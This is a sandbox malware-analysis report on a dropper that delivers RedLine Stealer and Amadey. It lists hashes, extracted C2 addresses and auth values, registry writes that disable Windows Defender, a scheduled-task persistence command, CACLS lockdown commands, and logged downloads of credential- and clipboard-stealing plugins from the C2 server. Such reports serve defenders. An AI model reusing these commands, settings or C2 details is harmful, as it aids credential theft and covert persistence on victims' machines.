Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
138s -
max time network
142s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
01/03/2023, 14:12 UTC
Static task
static1
General
-
Target
3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe
-
Size
1.3MB
-
MD5
288cb7304273592dfc9aa4a4d8020e19
-
SHA1
1b8fd171d5240eb01318ab9a11364bbdbf96c7c3
-
SHA256
3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc
-
SHA512
ad052ade26b719781036498f55327ddcd601505e1b8bfd3824e598e3ae412524233923dc5c48238dfff9f457c48bbeb24d4e1d7dcdd69cf4dd035e8f2b213dbd
-
SSDEEP
24576:GyZuEiN/R/JM3KEvcU35e3edpkdIjPx5wNZrDp3cklnivO:VZ6N/1q6DU+eTkcY3pMk1a
Malware Config
Extracted
redline
rumfa
193.233.20.24:4123
-
auth_value
749d02a6b4ef1fa2ad908e44ec2296dc
Extracted
amadey
3.67
193.233.20.15/dF30Hn4m/index.php
Extracted
redline
forma
193.233.20.24:4123
-
auth_value
50b8e065d7cb1e9e30786f7a370368f9
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" rbT81kv20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" rbT81kv20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" iQT68ZR45.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" iQT68ZR45.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" rbT81kv20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" iQT68ZR45.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" iQT68ZR45.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" iQT68ZR45.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" rbT81kv20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" rbT81kv20.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 39 IoCs
resource yara_rule behavioral1/memory/2792-169-0x0000000002630000-0x0000000002676000-memory.dmp family_redline behavioral1/memory/2792-173-0x0000000004B30000-0x0000000004B74000-memory.dmp family_redline behavioral1/memory/2792-174-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-181-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-183-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-179-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-185-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-177-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-175-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-187-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-189-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-191-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-193-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-195-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-197-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-199-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-201-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-203-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-205-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-207-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-209-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-211-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-213-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-215-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-218-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-221-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-223-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-225-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-227-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-229-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-231-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-233-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-235-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-237-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/2792-239-0x0000000004B30000-0x0000000004B6E000-memory.dmp family_redline behavioral1/memory/3928-1146-0x0000000002220000-0x0000000002266000-memory.dmp family_redline behavioral1/memory/3928-1264-0x0000000004C00000-0x0000000004C10000-memory.dmp family_redline behavioral1/memory/3928-2059-0x0000000004C00000-0x0000000004C10000-memory.dmp family_redline behavioral1/memory/3928-2060-0x0000000004C00000-0x0000000004C10000-memory.dmp family_redline -
Executes dropped EXE 14 IoCs
pid Process 4556 vmdf66IJ83.exe 5008 vmuI06bO58.exe 3656 vmal60BH54.exe 5112 vmgA19vj72.exe 2608 vmRv07Os78.exe 976 iQT68ZR45.exe 2792 kuB86uH85.exe 3956 mIJ53KP90.exe 3928 nCi10Il52.exe 4368 rbT81kv20.exe 464 sf36Rw29EW91.exe 3780 mnolyk.exe 1796 tv02XX88jN48.exe 2076 mnolyk.exe -
Loads dropped DLL 1 IoCs
pid Process 2216 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" iQT68ZR45.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" mIJ53KP90.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" rbT81kv20.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" vmdf66IJ83.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" vmuI06bO58.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" vmal60BH54.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vmgA19vj72.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vmdf66IJ83.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vmuI06bO58.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vmal60BH54.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" vmgA19vj72.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vmRv07Os78.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" vmRv07Os78.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 976 iQT68ZR45.exe 976 iQT68ZR45.exe 2792 kuB86uH85.exe 2792 kuB86uH85.exe 3956 mIJ53KP90.exe 3956 mIJ53KP90.exe 3928 nCi10Il52.exe 3928 nCi10Il52.exe 4368 rbT81kv20.exe 4368 rbT81kv20.exe 1796 tv02XX88jN48.exe 1796 tv02XX88jN48.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 976 iQT68ZR45.exe Token: SeDebugPrivilege 2792 kuB86uH85.exe Token: SeDebugPrivilege 3956 mIJ53KP90.exe Token: SeDebugPrivilege 3928 nCi10Il52.exe Token: SeDebugPrivilege 4368 rbT81kv20.exe Token: SeDebugPrivilege 1796 tv02XX88jN48.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2896 wrote to memory of 4556 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 66 PID 2896 wrote to memory of 4556 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 66 PID 2896 wrote to memory of 4556 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 66 PID 4556 wrote to memory of 5008 4556 vmdf66IJ83.exe 67 PID 4556 wrote to memory of 5008 4556 vmdf66IJ83.exe 67 PID 4556 wrote to memory of 5008 4556 vmdf66IJ83.exe 67 PID 5008 wrote to memory of 3656 5008 vmuI06bO58.exe 68 PID 5008 wrote to memory of 3656 5008 vmuI06bO58.exe 68 PID 5008 wrote to memory of 3656 5008 vmuI06bO58.exe 68 PID 3656 wrote to memory of 5112 3656 vmal60BH54.exe 69 PID 3656 wrote to memory of 5112 3656 vmal60BH54.exe 69 PID 3656 wrote to memory of 5112 3656 vmal60BH54.exe 69 PID 5112 wrote to memory of 2608 5112 vmgA19vj72.exe 70 PID 5112 wrote to memory of 2608 5112 vmgA19vj72.exe 70 PID 5112 wrote to memory of 2608 5112 vmgA19vj72.exe 70 PID 2608 wrote to memory of 976 2608 vmRv07Os78.exe 71 PID 2608 wrote to memory of 976 2608 vmRv07Os78.exe 71 PID 2608 wrote to memory of 2792 2608 vmRv07Os78.exe 72 PID 2608 wrote to memory of 2792 2608 vmRv07Os78.exe 72 PID 2608 wrote to memory of 2792 2608 vmRv07Os78.exe 72 PID 5112 wrote to memory of 3956 5112 vmgA19vj72.exe 74 PID 5112 wrote to memory of 3956 5112 vmgA19vj72.exe 74 PID 5112 wrote to memory of 3956 5112 vmgA19vj72.exe 74 PID 3656 wrote to memory of 3928 3656 vmal60BH54.exe 75 PID 3656 wrote to memory of 3928 3656 vmal60BH54.exe 75 PID 3656 wrote to memory of 3928 3656 vmal60BH54.exe 75 PID 5008 wrote to memory of 4368 5008 vmuI06bO58.exe 76 PID 5008 wrote to memory of 4368 5008 vmuI06bO58.exe 76 PID 4556 wrote to memory of 464 4556 vmdf66IJ83.exe 77 PID 4556 wrote to memory of 464 4556 vmdf66IJ83.exe 77 PID 4556 wrote to memory of 464 4556 vmdf66IJ83.exe 77 PID 464 wrote to memory of 3780 464 sf36Rw29EW91.exe 78 PID 464 wrote to memory of 3780 464 sf36Rw29EW91.exe 78 PID 464 wrote to memory of 3780 464 sf36Rw29EW91.exe 78 PID 2896 wrote to memory of 1796 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 79 PID 2896 wrote to memory of 1796 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 79 PID 2896 wrote to memory of 1796 2896 3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe 79 PID 3780 wrote to memory of 840 3780 mnolyk.exe 80 PID 3780 wrote to memory of 840 3780 mnolyk.exe 80 PID 3780 wrote to memory of 840 3780 mnolyk.exe 80 PID 3780 wrote to memory of 628 3780 mnolyk.exe 82 PID 3780 wrote to memory of 628 3780 mnolyk.exe 82 PID 3780 wrote to memory of 628 3780 mnolyk.exe 82 PID 628 wrote to memory of 232 628 cmd.exe 84 PID 628 wrote to memory of 232 628 cmd.exe 84 PID 628 wrote to memory of 232 628 cmd.exe 84 PID 628 wrote to memory of 228 628 cmd.exe 85 PID 628 wrote to memory of 228 628 cmd.exe 85 PID 628 wrote to memory of 228 628 cmd.exe 85 PID 628 wrote to memory of 212 628 cmd.exe 86 PID 628 wrote to memory of 212 628 cmd.exe 86 PID 628 wrote to memory of 212 628 cmd.exe 86 PID 628 wrote to memory of 1636 628 cmd.exe 87 PID 628 wrote to memory of 1636 628 cmd.exe 87 PID 628 wrote to memory of 1636 628 cmd.exe 87 PID 628 wrote to memory of 4016 628 cmd.exe 88 PID 628 wrote to memory of 4016 628 cmd.exe 88 PID 628 wrote to memory of 4016 628 cmd.exe 88 PID 628 wrote to memory of 336 628 cmd.exe 89 PID 628 wrote to memory of 336 628 cmd.exe 89 PID 628 wrote to memory of 336 628 cmd.exe 89 PID 3780 wrote to memory of 2216 3780 mnolyk.exe 91 PID 3780 wrote to memory of 2216 3780 mnolyk.exe 91 PID 3780 wrote to memory of 2216 3780 mnolyk.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe"C:\Users\Admin\AppData\Local\Temp\3e8315e58c0abe710000c0ac3156cd235a5c81bf4b115eef82de089ed29661fc.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vmdf66IJ83.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vmdf66IJ83.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vmuI06bO58.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vmuI06bO58.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vmal60BH54.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vmal60BH54.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vmgA19vj72.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vmgA19vj72.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vmRv07Os78.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vmRv07Os78.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\iQT68ZR45.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\iQT68ZR45.exe7⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\kuB86uH85.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\kuB86uH85.exe7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\mIJ53KP90.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\mIJ53KP90.exe6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nCi10Il52.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nCi10Il52.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rbT81kv20.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rbT81kv20.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sf36Rw29EW91.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sf36Rw29EW91.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F5⤵
- Creates scheduled task(s)
PID:840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:232
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:N"6⤵PID:228
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:R" /E6⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:1636
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\4f9dd6f8a7" /P "Admin:N"6⤵PID:4016
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\4f9dd6f8a7" /P "Admin:R" /E6⤵PID:336
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main5⤵
- Loads dropped DLL
PID:2216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tv02XX88jN48.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tv02XX88jN48.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exeC:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe1⤵
- Executes dropped EXE
PID:2076
Network
-
Remote address:8.8.8.8:53Request24.20.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.8.109.52.in-addr.arpaIN PTRResponse
-
Remote address:193.233.20.15:80RequestPOST /dF30Hn4m/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.15
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 01 Mar 2023 14:13:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.20.15:80RequestGET /dF30Hn4m/Plugins/cred64.dll HTTP/1.1
Host: 193.233.20.15
ResponseHTTP/1.1 404 Not Found
Date: Wed, 01 Mar 2023 14:14:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
-
Remote address:193.233.20.15:80RequestGET /dF30Hn4m/Plugins/clip64.dll HTTP/1.1
Host: 193.233.20.15
ResponseHTTP/1.1 200 OK
Date: Wed, 01 Mar 2023 14:14:06 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Fri, 17 Feb 2023 15:45:35 GMT
Connection: keep-alive
ETag: "63efa11f-16400"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request15.20.233.193.in-addr.arpaIN PTRResponse
-
2.5MB 38.7kB 1780 815
-
322 B 7
-
2.5MB 37.1kB 1779 773
-
322 B 7
-
2.5MB 38.9kB 1780 820
-
3.8kB 94.9kB 75 74
HTTP Request
POST http://193.233.20.15/dF30Hn4m/index.phpHTTP Response
200HTTP Request
GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dllHTTP Response
200 -
322 B 7
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
177KB
MD552a5be6115a6a12aa845060226ec8982
SHA1db9d33847dd6f6da6fab70c5b4524344927d41d7
SHA2562122abf410b407e5b616552f28c12cff83dc9ee469dec33b9365d8f066339b77
SHA512b99426bb6760284e7d871d25f687193ab2a851dd6ba7eab4e843b42389ae929ed621d864d5cd11b2d70b869a42abc096e4f5950d7810a6ad795a8faf569bd44b
-
Filesize
177KB
MD552a5be6115a6a12aa845060226ec8982
SHA1db9d33847dd6f6da6fab70c5b4524344927d41d7
SHA2562122abf410b407e5b616552f28c12cff83dc9ee469dec33b9365d8f066339b77
SHA512b99426bb6760284e7d871d25f687193ab2a851dd6ba7eab4e843b42389ae929ed621d864d5cd11b2d70b869a42abc096e4f5950d7810a6ad795a8faf569bd44b
-
Filesize
1.2MB
MD57db6dbc918a33d12613ece161db9a369
SHA164c71f852e42a046324a12dc08bbd54a68ee14a9
SHA256c8ab50b9f1d0672b9eb3680afd8d33805cd914ae096f88540550dbed8c3b6fa7
SHA512db812eef69812a9ab5a5c0db9e8644b9954810b37407b05a6a12c1204ecebff16f94bbd7beea1106c74baf7633e2c2d102a36942a0c15bd81bb1adbb79912afc
-
Filesize
1.2MB
MD57db6dbc918a33d12613ece161db9a369
SHA164c71f852e42a046324a12dc08bbd54a68ee14a9
SHA256c8ab50b9f1d0672b9eb3680afd8d33805cd914ae096f88540550dbed8c3b6fa7
SHA512db812eef69812a9ab5a5c0db9e8644b9954810b37407b05a6a12c1204ecebff16f94bbd7beea1106c74baf7633e2c2d102a36942a0c15bd81bb1adbb79912afc
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
240KB
MD54551305eb4caa92f6df8d241fd1da03f
SHA1a870b957a3ccc67a7980872f9e3ca9ae34303251
SHA256583e150ac5ad22f4bf573c9ee643d8dc8b4bb4ef335f2e1782ee6be290f2633b
SHA5121b70d4a618e037247e1f9db373b9f8999d47e63c1956f154910b336f4b4e28c917c32f87eb6c3806b3faf36b65cc1e5942e191a567addd2978e11313b703bb50
-
Filesize
996KB
MD59768f8c3f81037bae488c21469507398
SHA1031451fb6fc68a4de0130e1c4a1a6dfd1918599d
SHA256d711a5192d413b3a09da7b306d9ec710bd214ec43760e1c63e41e4ae90057a96
SHA512fccc0efc8ec9ce89840980edb2aa917379af03f7fd6f13eca7b280083427c2735e3495ee943c787811f46c3d1d2ba6a0500dbceb24b3fe75de4cd751d787fe02
-
Filesize
996KB
MD59768f8c3f81037bae488c21469507398
SHA1031451fb6fc68a4de0130e1c4a1a6dfd1918599d
SHA256d711a5192d413b3a09da7b306d9ec710bd214ec43760e1c63e41e4ae90057a96
SHA512fccc0efc8ec9ce89840980edb2aa917379af03f7fd6f13eca7b280083427c2735e3495ee943c787811f46c3d1d2ba6a0500dbceb24b3fe75de4cd751d787fe02
-
Filesize
17KB
MD59e3acbec659556bf4fbc7440ff9cdc32
SHA1ed3e0982b2144cc4614bae9283cb46f6bfdfc659
